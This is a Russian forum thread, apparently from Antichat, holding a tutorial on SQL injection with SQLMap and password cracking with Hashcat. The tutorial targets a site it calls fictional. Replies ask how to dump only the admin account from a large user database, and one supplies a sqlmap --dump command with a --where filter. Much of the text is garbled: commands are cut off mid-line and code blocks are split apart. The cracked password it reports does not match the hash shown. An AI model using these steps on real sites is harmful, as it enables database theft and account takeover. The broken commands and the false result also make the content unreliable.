![]() |
познавательно
Цитата:
ааа, это перевод.. пардон |
Я вообще думал что cudahashcat и oclhashcat - это уже давно не рабочие инструменты, и что hashcat заменил их оба!!!
|
подскажите, а если в базе данных более 10к пользователей?! можно каким то образом не дампить всех пользователей а именно админа? и как понять кто из них админ. что-то я не догоняю
|
Цитата:
SELECT * FROM login WHERE id=1 |
Цитата:
|
Цитата:
sqlmap -u http://vulnsite.php?id=1 -D db_name --where="id=1" --dump P.S. Встречаются ограничения в плане привилегий, когда текущий пользователь, например может получить названия таблиц и колонок, а записи из колонок нет. Ещё может быть 2 и более баз данных на сайте, и в текущей базе никаких вкусняшек нет, но они находятся в других базах . |
Может ли лежать пароль от админки сайта в information_schema? или в базе данных?
|
Цитата:
https://forum.antichat.xyz/attachments/4890554/5645.png |
https://forum.antichat.xyz/attachmen...1317850909.png
Всем привет, античат ! Предыдущая часть: SQLMAP: гайд по SQL-инъекциям и обходу WAF (2025) Подробный гайд, который часто просят новички. Разберём классический сценарий — эксплуатация SQL-инъекции с помощью связки SQLMap + Hashcat. Пройдём весь путь от получения структуры базы данных до взлома пароля. Важно: всё, что вы увидите ниже — полностью вымышленный сценарий. URL, база данных и хеши созданы специально для этого руководства. Цель — научиться работать с инструментами, а не ломать реальные сайты. Помните об этике и законодательстве. Погнали! Представим, что мы уже нашли уязвимый параметр на неком сайте. Наш старт — вот этот URL: Код:
http://test-site.local/item.php?id=15Шаг 1: Разведка. Узнаём столбцы в таблице Код:
user_infoКод:
user_infoКод:
clemcoindustriesКоманда: Bash: Код:
sqlmap -u
Код: Код:
[INFO] retrieved: user_id — int(10) unsignedКод:
user_loginКод:
user_passwordШаг 2: Получаем имена пользователей Теперь, когда мы знаем, где искать, давайте вытащим логины. Это полезно, чтобы убедиться, что в таблице вообще есть данные. Bash: Код:
sqlmap -u
Код: Код:
Database: clemcoindustriesКод:
adminШаг 3: Извлекаем хеш пароля Действуем по аналогии, но теперь наша цель — столбец Код:
user_passwordBash: Код:
sqlmap -uКод: Код:
Database: clemcoindustriesШаг 4: Определяем тип хеша Что это за строка Код:
202cb962ac59075b964b07152d234b70Код:
hash-identifierВводим наш хеш: Код: Код:
$ hash-identifierШаг 5: Крашим хеш с помощью Hashcat Финальный рывок. Создаём файл Код:
hash.txtBash: Код:
hashcat -m
Код: Код:
202cb962ac59075b964b07152d234b70:abc123Код:
abc123Конечно, наш вымышленный пример был довольно простым. В реальных задачах всё бывает куда интереснее: фильтры, кастомное хеширование и многоуровневая защита. Чтобы увидеть, как похожие техники применяются на практике, очень советую почитать разборы (райтапы) с CTF. Там можно подсмотреть много полезных фишек. Вот, например, пара свежих разборов веб-заданий от наших форумчан:Мораль и защита: что нужно знать А теперь самое главное. Мы всё это делали не ради взлома, а чтобы понять, как защищаться.
Цитата:
|
| Время: 22:13 |